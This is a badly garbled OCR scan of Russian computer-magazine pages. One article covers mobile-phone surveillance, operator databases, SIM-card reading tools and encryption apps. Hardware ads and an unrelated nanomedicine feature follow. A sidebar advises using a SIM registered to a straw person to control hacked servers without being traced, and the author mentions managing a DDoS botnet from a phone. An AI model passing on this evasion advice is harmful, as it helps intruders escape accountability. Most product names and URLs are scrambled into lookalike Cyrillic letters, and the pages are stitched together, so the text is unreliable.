можно по специальной иконке (воскли- 
цательный знак на телефонах Зіетепз и 
Егісззоп и разомкнутый замок у Ыокіа), ко- 
торая появляется в случае его отключения. 
Как правило, у новых моделей такой воз- 
можности нет, поскольку производители 
считают ее ненужной... 

О «А5!» — «Мимо!» — «02». — «Тоже 
мимо!» — «К8». — «Попал...» 

Узнать твое месторасположение, когда 
и куда ты звонил, — все это не проблема. 
Добропорядочный оператор сотовой связи 
(а в России все ОПОСЫ добропорядочные) 
ведет тотальный учет собственных абонентов. 
На борту его серверов крутится несколько 
учетных баз. Наиболее актуальные из них: 

• База информации об абонентах 
(ЗиЬзсгіЬег баіаЬазе) — содержит регистра- 
ционные данные абонентов. Такие базы не 
раз уплывали в публичный доступ, переда- 
ривалась, попадали на рынки и даже частич- 
но выкладывались в инете. 

• Реестры расположения собственных 
абонентов (Ноте Ьосаііоп Редізіег, НІ_Р) и 
гостей сети (Ѵізііогз Босаііоп Редізіег, ѴІ_Р) 
— необходимы для хранения информации 
о месторасположении абонентов. В про- 
цессе использования мобильной сети ин- 
формация в регистрах обновляется, и таким 
образом осуществляется трассировка (оп- 
ределение месторасположения) абонента. 

• Регистр идентификации оборудования 
(Едиіртепі Ісіепіііу Редізіег, ЕІР) — часто 
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> Управление сервером с экрана мобильника! 




> Вот эта маленькая программа 
считает все данные ствоей ЗІМ’ки! 



интегрирован с НІ_П. Этот регистр содер- 
жит перечень ІМЕІ мобильных телефонов, 
которым запрещен доступ в сеть, или ко- 
торые находятся под наблюдением. Это 
сделано для отслеживания ворованных 
телефонных аппаратов. 

•База информации об абонентах 
СЭР(СаІЮаіаРесогсІ) — это самая большая 
база с информацией обо всех разговорах 
и переписке абонентов. В общем случае 
каждая запись СЭР содержит следующие 
данные: кто звонит; кому звонит; ІМЕІ-но- 
мера обоих мобильников; длительность 
соединения; тип услуги; базовая станция, 
начавшая обслуживание соединения. Пос- 
кольку это централизованная база дан- 
ных, можно без труда выяснить, кто звонил 
с того или иного мобильника, даже если для 
звонка использовались разные 8ІМ-карты. 
Для этого достаточно отфильтровать запи- 
си по ІМЕІ-номеру. 

Поднимая же записи базовых станций, об- 
служивавших звонок, следствие может вос- 
становить местоположение абонентов с точ- 
ностью до соты, в которой они находились 
в момент звонка или отправки зпгіз. А допол- 
нительные средства, например так называе- 
мая триангуляция, позволяют выяснить еще 
более точно месторасположение! Кстати 
говоря, методы трейсинга абонента приме- 
няются не только для поимки преступников 
и насоливших хакеров. Трейсинг помогает 
найти человека, который попал в беду в дре- 
мучем лесу, или, например, предотвратить 
использование мобильников на закрытой 
территории. Правда, в России в последнем 
случае применяются глушилки 08М/0РР8, 
но за границей нередко используют специ- 
альное оборудование. Одна из таких штучек 
— комплекс 8епзог-Ыеі ( уууууу.зепзогпеЦаоу ). 
с помощью которого любой человек может 
быть вычислен до метра, а все данные будут 
отображены на карте местности с подсвет- 
кой действующих радиосигналов. 



□ Защищайтесь, сэр! 

Подобное положение дел с личной безопас- 
ностью выглядит удручающе, но от многих бед 
есть спасение. Этой проблемой давно занима- 
ются несколько исследовательских центров, 
работающих над решением, исключающим 
возможность прослушки. Очень часто в этих 
целях используют так называемые скремб- 
леры, которые сжимают исходящие данные 
и шифруют их отличным от А5 алгоритмом. 
Правда, это влечет за собой появление не- 
большой задержки в разговоре — от 0,8 до 1 
секунды, так что, задав вопрос, ответ следует 
ждать не ранее чем через 2x0, 8= 1,6 секунды. 
Наиболее известные открытому рынку скрем- 
блеры — ОРЕШЕК ( ѵѵѵѵѵѵ.2Іпіо.ги/ііет/339 ). РЕ- 
ФЕРЕНТ 08М ( ѵѵѵѵѵѵ.2ІпІо.ги/і1ет/1 181 1. БУТОН- 
М. Устройства совместимы с современными 
моделями мобильных и подключаются к порту 
телефона как обычная ЬапсМгее-гарнитура. 
А для некоторых популярных моделей и вовсе 
существуют версии с интегрированным скрем- 
блером — это так называемые криптофоны. 
Условие их использования одно: для установки 
защищенного соединения необходим крип- 
тофон с каждой из разговаривающих сторон. 
Один из самых навороченных криптофончи- 
ков — АІМСОРТ ( ѵѵѵѵѵѵ.сгѵрІоазт.пЛ Это новый 
специализированный криптографический 
мобильный телефон стандарта Ѳ8М 900/1800, 
обеспечивающий связь в защищенном режи- 
ме, шифрование электронной переписки и 
зпгіз. Все документы и данные можно спрятать с 
помощью пароля ЕЭА(Епсгурііоп ЭаІаАссезз), 
что не даст обнаружить необходимые улики при 
анализе сотового. Аппарат базируется на про- 
цессоре Моіогоіа МХ21266 МГц с операцион- 
ной системой ѴѴіпСЕ 4.2. Криптографическая 
начинка телефона не разглашается. Пока он 
считается самым дорогим телефоном в мире 
и распространяется с бриллиантовой окантов- 
кой, сделанной на заказ. Мобильник исполь- 
зуется ѴІР-персонами и государственными 
чиновниками для обеспечения собственной 



безопасности. Все это, конечно, круто, но от- 
куда нам взять бабки на такое дело? Неоткуда! 
Зато, если на борту твоего смартфона крутит- 
ся одна из современных мобильных программ, 
можно защитить хотя бы свою переписку. Это 
хоть как-то обезопасит тебя при общении и в 
некоторых случаях даже сэкономит деньги. 
Итак, поехали. 

Роіггігес Гог ЗутЬіап 03 
Платформа: ЗутЬіап ОЗ 
Сайт: ѵѵѵѵѵѵ.роіпізес.сот 

Утилита работает со всевозможными типами 
файлов, включая изображения, сообщения 
зтз и электронной почты, документы ѴѴогсІ и 
АбоЬе, а также презентации Роѵѵег Роіпі Кро- 
ме этого, она умеет защищать информацию, 
хранящуюся на карточках памяти. 

ГоНгеггЗМЗ 

Платформа: ЗутЬіап ОЗ 

Сайт: ѵѵѵѵѵѵ.ІоЦгеззтаіІ.пеіЛогІгезз зтз. Ыт 

Пользователи Роіігезз ЗМЗ могут создавать и 
читать зашифрованные сообщения непосредс- 
твенно на своих смартфонах без обязательно- 
го наличия каких-либо новых аппаратных ре- 
шений у оператора. Сообщения сохраняются в 
закриптованном виде, и просмотреть их можно 
только после ввода пароля. Примечательно, 
что Рогігезз ЗМЗ поддерживает несколько ал- 
горитмов шифрования (АЕЗ, МЭ5), проверку 
целостности информации, а также систему 
ШІССЮЕ, что исключает любые проблемы с 
кириллицей. 

Роіп+зес 

Платформа: ЗутЬіап ОЗ 
Сайт: ѵѵѵѵѵѵ.роіпізес.сот 

Отличная программа для работы с зтз. Может 
симулировать прием сообщения (очень помо- 
гает, когда ищешь повод для ухода), отправлять 
сообщения в заданное время, шифровать их, 
прятать от определенного номера и многое 
другое. 
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> Вот так информация отебе распространяется по 
базам оператора 
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Универсальный процессорный 
кулер (для процессоров ІпІеІ и АІѴЮ) 
с уникальным дизайном и велико- 
лепной производительностью 




ЕгпоЗЕС Зесиге 5М5 
Платформа: ЗутЬіап ОЗ 
Сайт: ѵѵѵѵѵѵ.етозесиге.сот 

По мнению ѵѵѵѵѵѵ.азтаѵѵагсіз.сот . это лучший продукт для шиф- 
рования зтз. 

ЗтгРго^есЪг 
Платформа: МѴА 
Сайт: ѵѵѵѵѵѵ.ѵѵсе.Ьѵ 

А это уже ^ѵа-мидлет для шифрования сообщений, поэтому 
его можно использовать практически на любых телефонах. 
Но спешу предупредить: автор не гарантирует стойкость системы. 

ВЧтопомнитмобильник? 

Теперь поговорим о том, что есть в любом мобильном телефо- 
не, — о ЗІМ-карте. Не стоит относиться к ней исключительно 
как к средству идентификации абонента в мобильных сетях. 
ЗІМ’ка, помимо всего прочего, является еще и контейнером для 
хранения информации: контактов и зтз-сообщений. Ты пред- 
ставляешь, насколько важны эти данные? Если неприятель до- 
берется до твоей ЗІМ-карты, то легко определит круг твоего 
общения, родных и близких, а это далеко не самая приятная 
ситуация. Атак как содержимое памяти ЗІМ-карты органи- 
зовано как набор из примерно 30-ти файлов, которые можно 
считать стандартным образом, поместив ЗІМ’ку в считыватель 
смарт-карт, сделать это довольно просто. Легче всего — имея 
коды доступа (РІ N или РІЖ), но даже без них спецслужбам и 
знающими людям удается вскрывать содержимое ЗІМ-карт. 
Такое, например, возможно с помощью чисто хакерских утилит 
СМр-іи ніфѴ/тоЬіІѳоііісѳ.со.га/сІоѵѵпІоасІ сіпіріі: зіт есІіІог.ІіІт Т 
РОІІ-Зру ( Н1ф://уууууу.поЬЫ.сот/боууп1оаб.Н!т ) или ЗІМ-Зсап 
( ИЦр://изегз.пе1.ѵи/~беіап Т 

В судебной практике обычно применяют более легитимные 
программы, например СагсІз4І_аЬз, разработанную специаль- 
но для органов правопорядка в Нидерландском институте кри- 
миналистики. Во многих случаях можно восстановить даже те 
данные, которые были удалены. Зтз-сообщения хранятся как 
во внутренней памяти телефона, так и на ЗІМ-карте, где раз- 
мещаются как правило в 12 слотах, имеющих длину 176 байт. 
На первом месте расположен байт состояния, аостальные 175 
байт — информация о конкретном сообщении (метка номера 
адресата, дата/время сообщения, собственно текст). Когда 
пользователь удаляет зтз, байт состояния выставляется в О, 
сигнализируя, что слот освободился, в то время как байты со 
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Сооіег Ма§1ег 
НН-ОСН-591Л-БР 
Ну рег ТХ (АМО) 

Стильный кулер для процессоров 
АІѴЮ: поддерживает новейшие 
процессоры на ЗоскеІ АМ2, а также 
и классические АІМоп 64 и Зетргоп 

ѵ 



/ 

Сооіег Ма§1ег 
КН-РСН-59Ш-БР 
Ну рег ТХ (ІпСеІ) 

Стильный кулер для процессоров 
ІпІеІ: поддерживает как новейшие 
двуядерные процессоры, так и 
классические Репйипл IV и Сеіегоп О 
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Сооіег Ма§1ег 
НСА-РБ1 
Нурег СІС 

Новая версия кулера из легендарной 
линейки «Нурег» — мощный тяжеловес, 
способный охладить любую систему: 
как на ІпІеІ, так и на АІѴЮ 






ПИРИТ - официальный дистрибутор 
Сооіег ІѴІ а5Іег в России 



Компьютерный салон ПИРИТ: (495) 785-5554 

ПИ РИТ- Дистрибуция (оптовые поставки): (495) 97-43210 
ПИРИТ С.-Петербург (оптовые поставки): (812) 440-9089 



МОСКВА: ПИРИТ — 785-55-54, Зеон — 955-51-99, ИП Котов — 784-72-34 доб. 
Д-13, НИКС — 974-33-33, ОЛАНД — 788-19-18, Радиокомплект — 953-81-78, 
ЩЕДРИН — 784-72-34, Р0ВМ02А — 234-21-64, ОЗМ Сотриіегз — 540-91-88, 
ЫТ Сотриіег — 970-19-30, ІЛ.ТВА Сотриіегз — 775-75-66; ВОРОНЕЖ: РЕТ — 
77-93-39; ЕКАТЕРИНБУРГ: Диджитек — 377-74-07, Уральский завод 
вычислительной техники — 365-94-11; НИЖНИЙ НОВГОРОД: ЗІІЫВІЗЕ — 
19-44-62; САНКТ-ПЕТЕРБУРГ: Компьютер-Центр КЕЙ — 074, Компьютерный 
Мир — 333-00-33; УФА: Сеть магазинов КламаС — 91-21-12 




ПИРИТ 



і/ѵі/ѵі/ѵ. рігіг. г и 
ѵѵѵѵѵѵ.сісір.ги 



Объединенная розничная сеть РОЬАВІЗ и Техмаркет Компьютере: 
(495) 755-55-57 



)вар сертфииирован 
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> ѵѵѵѵѵѵ. 

тоЬІІерІіопѳЬгеп5ІС5. 
сот — все о восста- 
новлении и анализе ин- 
формации с мобильных 
телефонов. Компания 
работает на заказ, но на 
сайте часто выкладыва- 
ются очень интересные 
материалы. 
ѵѵѵѵѵѵ.дзт-зесигііу. 
пеі — сайт для тех, кто 
интересуется вопросами 
(ЗЗМ/ОРРЗ безопасности. 




> Весь описанный в 
статье софт и докумен- 
тацию по архитектуре 
8ІМ-картты найдешь на 
диске. Узнай же, нако- 
нец, о том, что творится 
утебя в мобильнике! 




> Вся приведенная 
информация дана 
исключительно для оз- 
накомления и ни в коем 
случае не может быть 
использована в проти- 
возаконных целях. 



2-го по 176-й остаются нетронутыми. Это значит, что 
информацию можно извлечь из ЗІМ-карты. 

С внутренней памятью телефона та же история, но уже со 
своей спецификой. Многие профессиональные програм- 
мы, например ЗІМІЗ ( уууууу.1сагб1огепз1с5.сот/31М13.а5р ') и 
ХРѴ ( уууууу.тзаЬ.сот ). работают не только с ЗІМ-картой, 
но еще и с памятью самых разнообразных сотовых теле- 
фонов и могут извлечь оттуда все что угодно: записную 
книжку, фотографии, сообщения, расписание, всютехни- 
ческую информацию и т. д. 

Внешне ХРѴ ( ѵѵѵѵѵѵ.тзаЬ.сот ) представляет собой комплект, 
состоящий из специального ресивера, который поддержи- 
вает ВІиеіооіН/ІВЭА/ІІЗВ, и диска с программным обеспе- 
чением. Вся информация с мобильника прогоняется через 
ресивер посредством беспроводных технологий, а подклю- 
чение по ІІЗВ позволяет перекинуть полученные данные на 
компьютер. В целях безопасности создается криптованный 
хгу-файл, на который можно наложить пароль. 

В качестве наглядного примера хочу рассказать тебе 
об одном любопытном случае с известным всему миру 
аукционом еВау, который проводила компания Тпізі 
Эідііаі. Компания приобрела на аукционе 10 мобильных 
телефонов бизнес-класса. При помощи специальной 
программы ее экспертам удалось раздобыть из недр па- 
мяти купленных телефонов любопытную информацию: 
планы транспортной компании, которая собиралась 
выиграть многомиллионный федеральный контракт по 
транспортировке; информацию о покупке лицензий на 
программное обеспечение общей суммой в 50 тысяч 
долларов США; данные о счетах в банках и паролях; де- 
тали предписаний и квитанций за сервисные платежи 
одного рабочего. Как тебе? Наверняка хочется узнать 
надежный способ для безвозвратного удаления всей 
инфы? Тогда тебе прямиком нужно отправляться на сайт 
ѵѵѵѵѵѵ.ѵѵігеіеззгесѵсііпа.сот/ііоте/сіаіа егазег/сіеіаиіі.азр. 
Там ты сможешь найти необходимый софт, а также про- 
читать о способах ручного сбрасывания накопившей- 
ся информации для всех марок мобильных телефонов. 
Например, для моего старенького Золу ЕгісззопТбІ 0 мож- 
но сделать Мазіег Резеі и навсегда забыть о том, что было на 
мобиле. Делает это так: вызывается меню, вводится «#,9,2», 
нажимается «Уез», вводится четырехзначный код безо- 
пасности (у меня его нет, поэтому проходит стандартный 
«0000»). Через несколько минут все безопасно удаляется. 
Если тебе интересно самому отследить данные 
на своем сотике, рекомендую прогу ЕсІЗІМ РРО 
( ѵѵѵѵѵѵ■іса^сIIо^епзісз■сот/ЕсIЗIМ■азр , )■ Она позволяет 
залезать в недра ЗІМ-памяти, редактировать любую 
информацию или вообще удалять ее. Если же она не 
подойдет, отправляйся за аналогичным софтом на 
ѵѵѵѵѵѵ.е-еѵісіепсе.іпіо/сеііиіаг.іпіті . где доступны про- 
граммы для любых моделей сотовыхтелефонов. 

О 0 неудачных шутках, 
или: «Вась, это РВИ» 

Наверняка тебя радуют развлечения с балк-гейтами для 
анонимной отправки зтз. Главное здесь — не переста- 



ПОЛЕЗНЫЙ СОФТ 

Мобильник — это не просто средство общения, но еще 
отличный инструмент для удаленного управления. 
Добавь к этому анонимную ЗІМ-карту, зарегистриро- 
ванную на подставное лицо (дроп), — и ты получаешь 
отличную возможность управлять порутанными сер- 
ваками без опасения быть найденным. При этом не обя- 
зательно даже подключать его к компьютеру, многое вы- 
полнимо прямо с экрана телефона! Правда, для этого 
нужно запастись подходящими программами: 

ЗЗН апсІТеІпеІсІіепіГэг тобііе рбопе 
ѵѵѵѵѵѵ.хк72.сот/ппісІрззІі/іпсІех. рНр 

ЗЗН1-, ЗЗН2- и ТеІпеІ-клиент для ^МЕ-устройств. Не- 
смотря на свой крохотный размер, имеет достаточную 
функциональность для соединения и управления лю- 
бым сервером. 

ТЗМоЬіІез РЮМ+ 
ѵѵѵѵѵѵ.зИарезегѵісез.сот 

Удаленный доступ к компьютеру посредством ПЭР не- 
отъемлемая фича в арсенале каждого хакера, поэ- 
тому аналог для мобильника имеет исключительную 
актуальность. 

КІокіа МоЬіІе ѴРЫ 
ѵѵѵѵѵѵ.покіа.сот/тоЫІеѵрп 

Клиент для мобильных телефонов Ыокіа, позволяющий 
подключаться к виртуальным частным сетям. Не надо 
объяснять, насколько будет здорово, если свой инте- 
рент-трафик пустить через шифрованный ѴРЫ-канал 
и таким образом полностью исключить возможность 
снифинга со стороны провайдера. В моей практике 
был случай, когдаприходилось прибегать к мобильным 
средствам для управления ЭОоЗ-ботнетом. 

Для того чтобы использовать ОРРЗ для анонимного 
серфинга, от тебя потребовался бы немалый баланс. 
Для серьезной экономии трафика и, соответственно, 
долларов насчетубыло разработано специальное при- 
ложение, которое применяет ЗоопР ( ѵѵѵѵѵѵ.зоопг.сот ). 
использующий А^Х-интерфейс. Тулза совместима 
с популярным мобильным браузером Орега МоЬіІе 
Вгоѵѵзег ( ѵѵѵѵѵѵѵѵ.орега.сот ) и, что особенно важно, ра- 
ботает на всех современных мобильных ОС. Одной из 
известных фишек технологии АЗАХ является уникаль- 
ный компонент 33 ХМІ_ Ніір РециезІ, позволяющий за- 
гружать только ту часть страницы, которая изменилась. 
Похожие принципы используются в работе с такими 
маститыми сервисами, как Ретоіе Эезкіор. На борту 
программы также содержатся встроенный планиров- 
щик задач, календарь, блокнот, Ретоіе Эезкіор СІіепЦ 
плагин интегрирования с ОиІІоок и Зкуре. Да-да, ты не 
ослышался, ЗоопР Таік — уникальная опция для ис- 
пользования Зкуре прямо с мобильного телефона. 
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раться с шутками и до смерти не напугать 
людей, тем более что все отправленные со- 
общения логируются вместе с ІР’шником. 
Не забывай о средствах сохранения ано- 
нимности (ЗЗН-туннелирование, сокс-прок- 
си, ѴРЫ, ТОР). Прикольно, что некоторые 
сервисы, в том числе известнейший СІіскаіеІІ 
( ѵѵѵѵѵѵ.сІіскаІеІІ.сот Т предоставляют доступ 
к своим услугам прямо с экрана мобильника 
через специальный ^ѴА-апплет. Но и в этом 
случае вместе с сообщением ты передаешь 
часть данных о себе. Чтобы такого не про- 
исходило, я бы предложил в особенно кон- 
фиденциальных случаях воспользоваться 
следующим решением — создать свой собс- 
твенный зтз-гейт. Это реализуемо с помощью 
пакета ( уууууу.аатти.ога ). который выполня- 
ет роль шлюза и управляется посредствам 
ѵѵеЬ-интерфейса. 



ОЭто неизбежно 

На самом деле, это лишь часть информа- 
ции, которая долгое время была в большем 
объеме засекречена. С образованием 
Европейского Союза появляются все бо- 
лее совершенные технологии и средства, 
обеспечивающие трейси нг/прослуши- 

вание практически любого абонента. Не- 
редко упоминается о возможностях до- 
ступа к телефону с опущенной трубкой и 
прослушивания всех разговоров рядом с 
телефонным аппаратом при полнейшем 
неведении пользователя. Да и вообще, по 
правде говоря, все движется в сторону гло- 
бального контроля: чего только стоит идея 
имплантировать всем людям РРЮ-чипы. 
Во что из этого верить — дело твое, но тай- 
ное обычно становится явным как раз в са- 
мый неподходящий момент, ш 




>Аппаратный ЗЗМ-снифер. Именнотак 
обычно выглядят ЕМ5І-саІсЬег’ы! 




І Полюс 



Компьютеры 



Высочайшая производительность 
Технология, на^к оторую 
можно'положйть'ся^ 



Позвольте сотрудникам реализовать свой потенциал. 
Выберите компьютер “Передовик” на базе двухъ ядерно г о 



іпзійё 



процессора Іпіеі® Соге™2 Оио. 

' л і 



Два ядра. 



( 812 ) 703 - 10-50 
( 812 ) 325 - 25-05 



сетевая интеграция, ноутбуки, 
рабочие станции и периферия 



Делай больше. 



1 ] 







МЕДИЦИНА 

АТАКУЕТ! 

ВСЕ О НАНОМЕДИЦИНЕ XXI ВЕКА ► 
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^ ітріап^ 



г 1 

Как ни крути, но в сравнении с другими науками медицина со времен Г иппократа развивается довольно медленно. Как ты понимаешь, ' 

связано это, в основном, стем, чточеловексам по себе — устройство сложное и не одно десятилетие понадобилось для изучения его тела 
от костей до отдельных клеток. В 50-х годах прошлого века, с расшифровкой структуры ДНК, появилась надежда на то, что когда-нибудь 
в отдаленном будущем медицина доберется наконец-то до корней любого заболевания, которых без изучения тела на молекулярном 
уровне не поймаешь. 



ы сам знаешь, что пока не пой- 
мешь, как работает и из каких 
частей состоит тот или иной 
девайс, отремонтировать его 
невозможно. Тело — такой же девайс, 
толькооченьсложный. Егоосновные «шес- 
теренки и запчасти» лежат в диапазоне 
размерных величин, который называется 
нанометровым. Вотпочемудо развития на- 
нотехнологий — комплекса наук, занимаю- 
щихся постройкой и изучением объектов, 
состоящих из отдельных молекул и атомов, 
— медицина была «поверхностной». 
Второй ляп медицины вообще — это то, что 
тебя начинают лечить уже после того, как 
болезнь не только появилась и развилась 
в теле, но еще и смогла «закрепиться» в 
нем, иначе тебе просто не поставили бы 
диагноз. То есть врачи начинают бороться 
за твое здоровье уже с фактического по- 
ражения. Как ты знаешь, лучшая защита — 
это нападение, поэтому медицина должна 
стать упреждающей, а это возможно толь- 
ко с помощью почти ежедневного обследо- 
вания каждой клетки организма. 

Конечно, при современном состоянии ме- 
дицинской техники об этом можно только 
мечтать, но ведь мы живем в мире, в котором 
есть не только клятва Г иппократа и скальпе- 
ли, чья форма сотни лет не менялась и со- 
хранилась в исходном виде до наших дней. 
Мы ведь на себе испытываем Закон Мура; 
видим, как появляются первые настольные 
ДНК-секвенаторы; знаем не понаслышке, 
что такое генная инженерия, наконец! Так 
что через несколько десятилетий медици- 
на приобретет совершенно другой облик. 
И в далеком 2050 году не мы будем ходить к 
врачу, а врачи миллиардами штук будут си- 
деть в нас, постоянно ремонтируя сдающие 
от старости клетки, следя за тем, чтобы мы 
не заболели. 

Революция под названием «наномеди- 
цина» намечается уже сегодня. Оставим 
скальпели и пилы в XX веке! Новый век бу- 
дет оперировать объекты, намного мень- 
шие, чем кости и сосуды. И все это станет 
реальностью благодаря быстрому разви- 




сделать размерами с красную 
кровяную клетку и запустить 
пару миллиардов таких маши- 
нок в кровь, то ты сможешь об- 
ходиться без воздуха несколь- 
ко часов. 

Этот очень простой наноробот 
спроектирован ученым Робер- 
том Фрайтасом. И если бы се- 
годня были такие инструменты, 
с помощью которых его можно 
было бы сделать, то дайвинг 
стал бы одним из самых попу- 
лярных видов спорта. 

Назвали робота респироцитом, 
то есть клеткой, отвечающей 
за транспорт респираторных 
газов. Его ориентировочный 
размер — 1 микрон в диаметре. 
Этот сферический наноробот 
должен быть изготовлен из 
18 миллиардов атомов. Оболоч- 
ку механизма образует углерод 
с кристаллической решеткой 
алмаза. 

Как я говорил выше, респиро- 
цит — простой гидропневмо- 
аккумулятор, который, соглас- 
но проекту, может нагнетать 
внутрь себя 9 миллиардов 





тию биотехнологии, генной инженерии, 
нанотехнологий и наноэлектроники. 

А для того чтоб ты знал, чего стоит ждать от 
врачей через лет 40-50, я расскажу о самых 
перспективных современных работах в об- 
ласти наномедицины. 

□ Почти новый человек 

Итак, начнем экскурсию в госпиталь второй 
половины XXI века! Основным «лекарс- 
твом» в эру наномедицины будут наноробо- 
ты — молекулярные машинки, способные 
на нехитрые операции. Вот, на- 
пример, ты знаешь, как рабо- 
тает компрессор? Накачивает 
воздух в емкость под давлени- 
ем. Простое устройство. А вот 
если его более сложный аналог 



молекул кислорода (02) и углекислого 
газа (С02). Позже эти газы выпускаются из 
респироцита под контролем бортового ком- 
пьютера. Газы сохраняются под давлением 
около 1000 атмосфер. 

Этот девайс, несмотря на простоту, будет за- 
программирован на то, чтобы полностью вы- 
полнять функцию переноса газов, которую 
осуществляют наши родные эритроциты. 

В проекте поверхность каждого робота 
на 37% покрыта 29160-ю молекулярными 
сортирующими роторами, которые, как на- 



> Механический фагоцит Фрайтаса 



> Кровеносный сосуд, выстланный наноалмазными 
роботами 
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> ѴѴогт — альтернативный девайс, поедающий бактерии 



> «Робокровь» 



сосы, накачивают или выпускают газы из 
внутреннего резервуара респироцита. Ког- 
да наноробот проплывает в альвеолярных 
капиллярах, давление кислорода в смеси 
с углекислым газом выше, поэтому борто- 
вой компьютер приказывает сортирующим 
роторам нагнетать в резервуары кислород, 
выпуская С02. И наоборот, когда устройс- 
тво определяет, что находится втканях, бед- 
ных кислородом, происходит выпуск кисло- 
рода и закачка углекислого газа. 

При этом респироцит будет в 236 раз эф- 
фективнее эритроцита, так как кислород, 
переносимый им под давлением, занимает 
гораздо меньший объем. И это благодаря 
исключительной прочности алмазоида — на- 
номатериала, позволяющего поддерживать 
внутри устройства такое высокое давление 
газов. Чтобы ты представил себе, как это 
много — 236 раз, я тебе скажу, чтопятикубо- 

> Атака микробов механофагоцитами 



вая инъекция пятидесятипроцентного рас- 
твора респироцитов в кровоток могла бы 
заменить всю кровь! 

Искусственные эритроциты будут иметь 
сенсоры для приема акустического сигнала 
от врача, который будет использовать уль- 
тразвуковой передатчик для подачи команд 
роботам, чтобы изменять ихповедение, пока 
они находятся в пациенте. Например, врач 
может дать команду респироцитам прекра- 
тить нагнетание кислорода и остановиться, 
а позже — дать команду о включении. 

А для достижения с помощью респироцитов 
эффектадлительного дыхания нужно будет 
несколько раз провести гипервентиляцию 
легких(10-12 раз глубоко вдохнуть). И после 
этих манипуляций ты сможешь находиться 
без кислорода в течение часа. 

Другой простой девайс будет кстати экстрим- 
щикам. Если ты порезался, как долго у тебя 




течет кровь и ты ходишь с пластырем? Не- 
сколько часов? А с помощью нанороботов, 
названных клоттоцитами, остановить крово- 
течение можно будет за несколько секунд. 
Принцип действия этих наномашин тоже до- 
вольно прост. Знаешь, как останавливается 
кровотечение в твоем кровотоке? Тромбоци- 
ты собираются вокруг и выпускают нити фиб- 
рина, которые, словно сети, ловят клетки. Так 
постепенно рана затягивается, но процесс 
этот довольно длительный, и ученые решили 
его ускорить с помощью нанороботов. 
Представь себе сферу диаметром 2-4 микро- 
на, в которую впихнули тонкую сеть, состоя- 
щую из волоконной массы. Как только проис- 
ходит кровотечение, данные об окружающем 
давлении поступают в бортовой компьютер, и 
механический тромбоцит выталкивает волок- 
на в непосредственной близости от разрыва 
капилляра или сосуда. 

Отдельные части волокон, контактируя с 
водой, находящейся в кровяной плазме, 
растворяются в ней, раскрываясь, подобно 
рыболовной сети. Красные кровяные клетки 
попадаютв искусственную сеть, которую об- 
разуют все большее и большее число акти- 
вирующихся механоцитов, и кровотечение 
останавливается. 

Как клоттоцит будет определять, когда 
следует выбрасывать связывающую сеть? 
Для этого у него будут встроенные сенсоры 
давления газов. Как только первый клотто- 
цит будет выброшен кровотоком из раны на 
поверхность человеческого тела, сенсоры 
немедленно сообщат бортовому компьюте- 
ру об изменениях в парциальных давлениях 
газов и устройство передаст эту инфор- 
мацию соседям при помощи акустических 
импульсов. Остальные же роботы при полу- 
чении этой информации немедленно акти- 
визируют сети. 

При этом сети смогут останавливать крово- 
течение в 100-1000 раз быстрее, чем в слу- 
чае, если бы оно останавливалось естест- 
венным образом, без присутствия в крови 
нанороботов. 

Как видишь, простые приемы, реализован- 
ные на клеточном уровне, могут очень по- 
мочь медикам. 
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> Стыковочные доки 



> Клоттоциты с выпущенными сетями. 



А что если мы придумаем что-нибудь по- 
сложнее, например машинку, которая ло- 
вит микробов? 

□ Заводные бактериофаги 

Оказывается, что с рядом медицинских задач 
наше бренное тело справляется очень непло- 
хо, правда, мы при этом несколько дней бо- 
леем гриппом, зарабатывая «бонусные очки» 
иммунитета, которые потом послужат нам ве- 
рой и правдой при атаке аналогичного вируса. 
Но зачем ждать, превращая тело в «гриппоз- 
ный полигон», если нанороботы могут за пол- 



часа уничтожить все болезнетворные вирусы 
и бактерии? Причем — используя совершен- 
но природный способ. Они их просто съедят. 
Да, оказывается, это не только самый при- 
родный, но и самый эффективный метод 
борьбы с инфекциями. Спроектированный 
Робертом Фрайтасом, наноробот — микро- 
фагоцит(тісгоЬіѵоге) — работаетвточности, 
как его органический аналог: все попавшие 
внутрь механизма бактерии и вирусы снача- 
ла тщательно перемалываются алмазоид- 
ными лезвиями, а затем перевариваются 
набором из 40 ферментов. 



ими 



>РогезідІіі Іпзіііиіе 
Ыапотесіісіпѳ ОаІІѳгу — 
наномедицинская 
галерея Института 
Предвидения 
ИДр://ѵѵѵѵѵѵ.іоге 5 ІдИІогд/МапотесІісіпе/ 
ОаІІегѵ 

КигігѵѵеіІАІ — Сайт Рэя Курцвейла, одного 
из самых ярых трансгуманистов 
ИДр://ѵѵѵѵѵѵ.киг2ѵѵеіІаі.пе1: 
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> Возможный вид клоттоцита 



> Структура алмазоида 



Иммунная система реагирует в ос- 
новном на «чужеродные» поверх- 
ности. Размер наноробота также 
играет при этом важную роль, как 
и мобильность устройства, ше- 
роховатость поверхности и ее 
подвижность. Вообще проблема 
биосовместимости, в принципе, не 
сложнее проблемы совместимости 
биоимплантантов. В некоторых слу- 
чаях эта проблема может оказаться 
проще, чем ее привыкли представ- 
лять, так как многие типы меди минс- 
ких нанороботов будут времен но на- 
ходиться вчеловеческомтеле. Даже 
на сегодняшний день применение 
иммуноподавляющих агентов на 
период наномедицинского лечения 
может способствовать пребыванию 
в теле человека «незащищенных» 
роботов и выполнению ими своей 
работы без проблем. 

Идеальный выход из этой проблемы — 
конструирование роботов из алма- 
зоидных материалов. Такое алмазо- 
идное покрытие («организованное», 
то есть нанесенное атом за атомом, 
с нанометровой гладкостью) будет 
иметь очень низкую биологическую 
активность и прочность алмаза. Бла- 
годаря физико-химическим свойс- 
твам алмазоидной поверхности и 
внешняя оболочка роботов будет 
полностью химически инертна. 



Благодаря специальным обратимым «при- 
соединительным гнездам» бактерия прили- 
пает к поверхности наноробота, как муха на 
липкую ленту. В самом нанороботе содер- 
жится несколько сотен телескопических 
наноманипуляторов, изготовленных по 
примеру «руки робота». Как только бакте- 
рии пойманы, они аккуратно собираются с 
поверхности робота манипуляторами и за- 
совываются во входной порт на передней 
части устройства — рот микрофагоцита. 
При этом «переваренные» роботом остат- 
ки бактерий представляют собой простые 
аминокислоты, мононуклеотиды, глицерин, 
воду, жирные кислоты и простые сахара, 
абсолютно безвредные для организма че- 
ловека. Интересно, что наши естественные 
фагоциты работают хуже: после перева- 
ривания бактерий остается много вредных 
веществ, которые вызывают интоксикацию 
организма. 

Вся операция по захвату и перевариванию 
вредоносного микроба, по идее, должна 
длиться не более 30 секунд. 
Представляешь, что случится в крови, если 
туда запустить армию таких машинок? Тера- 
певтическая доза (то есть минимальное ко- 
личество, необходимое для лечения) нано- 
роботов составляет 1-10 миллиардов штук. 
Но так как суммарный их объем — до трех 
